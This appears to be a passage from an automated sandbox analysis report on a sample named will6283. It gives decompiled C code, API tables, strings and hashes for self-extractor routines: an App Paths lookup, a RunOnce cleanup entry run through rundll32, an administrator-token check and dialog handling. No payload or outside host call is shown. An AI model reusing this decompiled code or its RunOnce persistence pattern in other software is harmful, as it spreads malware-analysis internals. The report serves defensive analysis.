					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E01061781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E0106658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E0106658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x1061140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E01061680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E01066CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}

0x01062773
0x0106277e
0x01062785
0x0106278a
0x0106278d
0x01062790
0x01062792
0x01062798
0x0106279d
0x010628b2
0x00000000
0x010627a3
0x010627a3
0x010627af
0x010627c2
0x010627c8
0x010627cd
0x010627d5
0x010628b7
0x010628b9
0x00000000
0x010627db
0x010627dd
0x010628aa
0x00000000
0x010627e3
0x010627e3
0x010627ec
0x010627f8
0x01062803
0x0106280b
0x01062831
0x010628c3
0x010628c9
0x010628cd
0x01062837
0x0106285a
0x0106285c
0x01062865
0x01062892
0x01062895
0x00000000
0x00000000
0x01062867
0x01062878
0x0106288c
0x00000000
0x0106287a
0x01062880
0x01062885
0x01062897
0x01062899
0x01062899
0x01062878
0x01062865
0x010628a0
0x010628bf
0x010628c1
0x00000000
0x00000000
0x010628c1
0x01062831
0x010627dd
0x010627d5
0x010628e5

APIs

CharUpperA.USER32(19E58FB5,00000000,00000000,00000000), ref: 010627A8
CharNextA.USER32(0000054D), ref: 010627B5
CharNextA.USER32(00000000), ref: 010627BC
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01062829
RegQueryValueExA.ADVAPI32(?,01061140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01062852
ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01062870
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010628A0
GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 010628AA
GetSystemDirectoryA.KERNEL32 ref: 010628B9

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 010627E4

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: f68cb392465411621b6480c431b0a47bec1a67e3613fecc8ad205bcfaee4ff38
Instruction ID: 749b075cdc48fd526b8fbd831a20fd2af037d82c732840184c821499db8045c5
Opcode Fuzzy Hash: f68cb392465411621b6480c431b0a47bec1a67e3613fecc8ad205bcfaee4ff38
Instruction Fuzzy Hash: 1541B070E01128AFEB659B689C85AFA7BBCEF55700F0040E9F5C9E3104CB758E818FA0

Uniqueness

Uniqueness Score: -1.00%

Function 01062267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E01062267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x1068004; // 0x19e58fb5
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x1068530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E0106658A( &_v268, 0x104, 0x1061140);
							}
							_push("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
							E0106171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E01066CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}

0x01062272
0x01062277
0x01062279
0x01062283
0x01062289
0x010622ab
0x010622b1
0x010622c4
0x010622e0
0x010622e6
0x010622f5
0x0106230d
0x0106231c
0x0106231c
0x01062321
0x0106233a
0x01062342
0x01062348
0x0106234b
0x0106234c
0x0106234c
0x0106234e
0x0106234f
0x0106236e
0x0106236e
0x0106237a
0x01062380
0x01062380
0x01062381
0x01062381
0x0106238f

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 010622A3
RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 010622D8
memset.MSVCRT ref: 010622F5
GetSystemDirectoryA.KERNEL32 ref: 01062305
RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0106236E
RegCloseKey.ADVAPI32(?), ref: 0106237A

Strings

wextract_cleanup1, xrefs: 0106227C, 010622CD, 01062363
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 01062299
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 01062321
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0106232D

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
API String ID: 3027380567-1226499438
Opcode ID: 149c13d4e5ed86fde65ae8889648a964371cb8144c9c90388f4da1fb4b416ba1
Instruction ID: ab5de5da548430224b209d4261397f56b3ae915c04d812f60e3041228e2873f7
Opcode Fuzzy Hash: 149c13d4e5ed86fde65ae8889648a964371cb8144c9c90388f4da1fb4b416ba1
Instruction Fuzzy Hash: 5631C871A00228ABDB719B55DC49FEA7BBCEB54740F0001EAF58DAA010EB75AB84CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01063100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E01063100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x1068590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x1068590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E010643D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x1068d4c);
					SetWindowTextA(_t33, "lega");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x10688b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E010630C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

0x01063108
0x0106310b
0x010631b7
0x010631ca
0x010631d0
0x010631d0
0x010631da
0x00000000
0x010631da
0x01063111
0x01063114
0x01063136
0x01063136
0x01063138
0x0106313b
0x01063141
0x00000000
0x01063143
0x01063116
0x0106311b
0x0106314b
0x01063151
0x01063158
0x0106316a
0x01063176
0x0106317d
0x0106318b
0x0106319e
0x010631a3
0x00000000
0x010631ad
0x01063120
0x00000000
0x00000000
0x0106312a
0x01063134
0x00000000
0x00000000
0x00000000
0x01063134
0x0106312c
0x00000000

APIs

EndDialog.USER32(?,00000000), ref: 0106313B
GetDesktopWindow.USER32 ref: 0106314B
SetDlgItemTextA.USER32(?,00000834), ref: 0106316A
SetWindowTextA.USER32(?,lega), ref: 01063176
SetForegroundWindow.USER32(?), ref: 0106317D
GetDlgItem.USER32(?,00000834), ref: 01063185
GetWindowLongA.USER32(00000000,000000FC), ref: 01063190
SetWindowLongA.USER32(00000000,000000FC,010630C0), ref: 010631A3
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 010631CA

Strings

lega, xrefs: 01063170

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: lega
API String ID: 3785188418-245445314
Opcode ID: 54a39c8eba512c4e72b5ec399847ed2948ce3a4deba10b1c6a10dfd75fef4a97
Instruction ID: 29029ce4af6add22c489c3a99560cff898ae4cf6c60318b0521957efc013ed2d
Opcode Fuzzy Hash: 54a39c8eba512c4e72b5ec399847ed2948ce3a4deba10b1c6a10dfd75fef4a97
Instruction Fuzzy Hash: 4811B431644262FFEB316F289C0CB5A3AB8FB46760F004611F9D9EE1A5DB7A9541C790

Uniqueness

Uniqueness Score: -1.00%

Function 010618A3 Relevance: 16.6, APIs: 11, Instructions: 112
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E010618A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x1068004; // 0x19e58fb5
				_v8 = _t23 ^ _t53;
				_t25 =  *0x1068128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E01066CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E010617EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x1068128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x1068128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}

0x010618a3
0x010618a3
0x010618ab
0x010618b2
0x010618b5
0x010618be
0x010618c0
0x010618c6
0x010618c7
0x010618ca
0x010618cf
0x010619c9
0x010619d8
0x010619d8
0x010618df
0x010619b8
0x010619bd
0x010619bf
0x010619bf
0x00000000
0x010619bd
0x010618fa
0x00000000
0x00000000
0x01061912
0x010619aa
0x010619ad
0x010619b3
0x00000000
0x01061927
0x01061927
0x01061932
0x01061936
0x010619a9
0x010619a9
0x00000000
0x010619a9
0x0106194c
0x010619a2
0x010619a3
0x00000000
0x0106196e
0x01061970
0x01061999
0x0106199c
0x00000000
0x0106199c
0x01061972
0x01061972
0x01061975
0x01061984
0x01061985
0x0106198a
0x00000000
0x00000000
0x00000000
0x0106198c
0x01061991
0x01061996
0x00000000
0x01061996
0x0106194c

APIs

Part of subcall function 010617EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010618DD), ref: 0106181A
Part of subcall function 010617EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0106182C
Part of subcall function 010617EE: AllocateAndInitializeSid.ADVAPI32(010618DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010618DD), ref: 01061855
Part of subcall function 010617EE: FreeSid.ADVAPI32(?,?,?,?,010618DD), ref: 01061883
Part of subcall function 010617EE: FreeLibrary.KERNEL32(00000000,?,?,?,010618DD), ref: 0106188A

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 010618EB
OpenProcessToken.ADVAPI32(00000000), ref: 010618F2
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0106190A
GetLastError.KERNEL32 ref: 01061918
LocalAlloc.KERNEL32(00000000,?,?), ref: 0106192C
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 01061944
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 01061964
EqualSid.ADVAPI32(00000004,?), ref: 0106197A
FreeSid.ADVAPI32(?), ref: 0106199C
LocalFree.KERNEL32(00000000), ref: 010619A3
CloseHandle.KERNEL32(?), ref: 010619AD

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: d484ae5ba00d5f1cc0f3937ae3f80409af32aa85fa9bddc91393857c51d13f44
Instruction ID: e69fdf2605a007c139731957d08a5672a89295f13b83088eec7a2dccd1fee311
Opcode Fuzzy Hash: d484ae5ba00d5f1cc0f3937ae3f80409af32aa85fa9bddc91393857c51d13f44
Instruction Fuzzy Hash: 94315E71A00209EFEB609FA5DC48ABFBBBCFF44304F104469F685E2154D7369904CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0106468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0106468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}

0x01064699
0x0106469b
0x010646a9
0x010646af
0x010646b4
0x010646bc
0x010646f9
0x00000000
0x010646f9
0x010646d9
0x010646dd
0x00000000
0x00000000
0x010646e5
0x010646ef
0x00000000
0x010646f5
0x010646ff

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646A0
SizeofResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646A9
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646C3
LoadResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646CC
LockResource.KERNEL32(00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646D3
memcpy_s.MSVCRT ref: 010646E5
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010646EF

Strings

TITLE, xrefs: 0106469D, 010646C0
lega, xrefs: 010646E4

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID: TITLE$lega
API String ID: 3370778649-934471404
Opcode ID: 93b779d773b2db3dd69cbf253643d355593598219f0b783579f526bfca125354
Instruction ID: 40d4cdfea5a8f46f93ff2869bfed31c8bd0408b96b8968fb7276e57c7a58deec
Opcode Fuzzy Hash: 93b779d773b2db3dd69cbf253643d355593598219f0b783579f526bfca125354
Instruction Fuzzy Hash: AB016236344210FBF3702AA96C4DF6B7E6DEB89B61F040014FBC9E7154C9668C4587A6

Uniqueness

Uniqueness Score: -1.00%

Function 010617EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E010617EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0x1068004; // 0x19e58fb5
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0x106a288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E01066CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x010617f6
0x010617fd
0x01061805
0x0106180b
0x0106180d
0x01061815
0x01061818
0x01061820
0x01061824
0x0106182c
0x01061832
0x01061837
0x01061851
0x01061854
0x0106185d
0x01061862
0x0106186c
0x01061872
0x01061877
0x0106187e
0x0106187e
0x01061883
0x01061883
0x0106185d
0x0106188a
0x0106188a
0x010618a2

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010618DD), ref: 0106181A
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0106182C
AllocateAndInitializeSid.ADVAPI32(010618DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010618DD), ref: 01061855
FreeSid.ADVAPI32(?,?,?,?,010618DD), ref: 01061883
FreeLibrary.KERNEL32(00000000,?,?,?,010618DD), ref: 0106188A

Strings

CheckTokenMembership, xrefs: 01061826
advapi32.dll, xrefs: 01061810

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: 89d0febd681f4c349a4bdffd620d8c3a04672ae601fc3846ff413c9ed87e48f6
Instruction ID: 6f8d8092094e1c761aa2e33ab2dc257855971c233cfcb68d7eea5f323a485249
Opcode Fuzzy Hash: 89d0febd681f4c349a4bdffd620d8c3a04672ae601fc3846ff413c9ed87e48f6
Instruction Fuzzy Hash: A4119371F00209EFEB20AFA4DC49ABEBBBCEF84700F100569FA41E7250DA359D008B90

Uniqueness

Uniqueness Score: -1.00%

Function 01063450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01063450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E010643D0(_t24, _t12);
					SetWindowTextA(_t24, "lega");
					SetDlgItemTextA(_t24, 0x838,  *0x1069404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0x10691dc = 1;
					goto L8;
				}
				return 0;
			}

0x01063459
0x0106345c
0x010634d8
0x010634de
0x00000000
0x010634e0
0x0106345e
0x01063463
0x0106349a
0x010634a0
0x010634a7
0x010634b2
0x010634c4
0x010634cb
0x00000000
0x010634cb
0x01063468
0x0106346e
0x01063474
0x00000000
0x00000000
0x0106347c
0x0106348c
0x01063490
0x00000000
0x01063496
0x01063484
0x00000000
0x00000000
0x01063486
0x00000000
0x01063486
0x00000000

APIs

EndDialog.USER32(?,?), ref: 01063490
GetDesktopWindow.USER32 ref: 0106349A
SetWindowTextA.USER32(?,lega), ref: 010634B2
SetDlgItemTextA.USER32(?,00000838), ref: 010634C4
SetForegroundWindow.USER32(?), ref: 010634CB
EndDialog.USER32(?,00000002), ref: 010634D8

Strings

lega, xrefs: 010634AC

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: lega
API String ID: 852535152-245445314
Opcode ID: c63b926b48f9498ce90e4272c976d495f67b5643a6ddb0d9f74fee150b696c19
Instruction ID: def09124d366514ebd39fa3f5d80a255baa6d43cb21167aa3cdd6b788d9d6ae4
Opcode Fuzzy Hash: c63b926b48f9498ce90e4272c976d495f67b5643a6ddb0d9f74fee150b696c19
Instruction Fuzzy Hash: C401B535740114EBD7266F69D80C96DBB98FF05750B004014FACA9F9A4CF36A951C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 01062AAC Relevance: 12.1, APIs: 8, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E01062AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x1068004; // 0x19e58fb5
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x1069a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E01061680(_t65, E010617C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E010665E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E01061680(_t65, E010617C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
